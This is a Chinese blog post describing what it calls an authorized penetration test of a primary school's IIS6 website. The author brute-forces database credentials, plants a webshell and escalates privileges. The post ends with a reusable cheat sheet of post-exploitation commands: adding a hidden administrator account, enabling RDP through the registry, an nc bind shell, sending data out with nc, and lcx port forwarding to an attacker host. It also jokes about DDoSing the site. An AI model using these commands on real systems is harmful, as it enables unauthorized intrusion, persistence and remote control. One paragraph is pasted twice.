一次授权测试的某小学网站过程

发布于 2016-09-13  622 次阅读


目标:
www.xxx.com


看样子应该是伪静态
后台改了,我们用工具送不出来, 那我们只能从别的地入手了
信息搜集很重要,于是我找了下服务器的信息

很明显是iis6的
是iis6 那么接下来就容易多了,为什么这么说呢 iis6的漏洞很多哦 至今为止iis6的服务器 我还没有提不下来的 只是时间问题。
好,既然知道是iis6的 那我们找下数据库把
ping了下ip 怎么ping 的 不用我多讲吧!

嗯,说实话 运气不错哦
我用默认的 root@root root@zkeys 都登陆不进去 于是乎我就去想爆破下吧 还是有几百万的密码数据哒 没想到真的搞出来了
但是又遇到难题的 路径在哪???所有爆路径的地址都无法访问 特么的 真想ddos轰下这网站;P 我不知道大家有没有仔细研究多爆路径的方法哈 其实数据库本身就给我们提供了一个大概的路径呀
在变量这
系统给出的是e:\ZkeysSoft\MySql\MySQL Server 5.0\ 那肯定不对的嘛 就算是新手 我们也有办法找到他的绝对路径呀 下载个这个 在本地安装下 就知道后面的路径 哦
e:/ZkeysSoft/phpmyadmin/phpmyadmin (经验)

拿下一句话后 准备在这个目录上传一个马儿 结果没有写入权限, 不知道什么原因。, 算了 不管他 反正有网站
找到了web目录 上传我们亲爱的webshell
既然webshell拿到了, 那么接下来 我们提权吧


拿下一句话后 准备在这个目录上传一个马儿 结果没有写入权限, 不知道什么原因。, 算了 不管他 反正有网站
找到了web目录 上传我们亲爱的webshell
既然webshell拿到了, 那么接下来 我们提权吧

组建支持 哈哈 只是天助我也 !

查可写目录 e:\recycler 就这个吧
上传cmd
日。。 好吧 去webshell执行把,



可以看到 查询账户是可以执行的 但是不能加用户
既然是iis6的 那我们可以利用iis6的溢出漏洞 传了个iis6.txt


3389 关闭了查下端口

成功拿下

附几条提权命令

mstsc /admin  运行-打开远程
systeminfo     查看系统配置
ipconfig         显示本地IP地址
netstat -a        查看端口
net start telnet           开telnet服务
net use z:127.0.0.1c$     映射对方的C盘 
net user            查看所有用户列表
net user tnthk lunge /add           添加用户tnthk密码为tnthk
net localgroup administrators lunge /add   将帐号tnthk升级为管理员 
开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
巴西烤肉   Churrasco.exe "命令"
使用方法:
C:\RECYCLER\Chu.exe "net user lunge lunge /add && net localgroup administrators lunge /add"
C:\RECYCLER\Chu.exe "net user admin$ /del"  删除帐号
query user  查看会话
logoff ID号  踢掉
C:\RECYCLER\Chu.exe "logoff 1"  
NC反弹
路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe
c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe
NC上传
DOS界面下运行:
NC -vv www.baidu.com 80<1.txt
-vv: 回显
80: www端口
1.txt: 就是你要发送的数据包
LCX端口转发
先本地监听51端口 lcx.exe -listen 51 3389
c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389    LCX转发

c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389

注:本人原创发表于 2016-9-13 10:41:13


网络安全研究员、渗透测试攻城狮
文能社会工程学,武能过狗拿shell
日的了站,做的了饭。
人生格言:即使是咸鱼,也一定是最咸的那条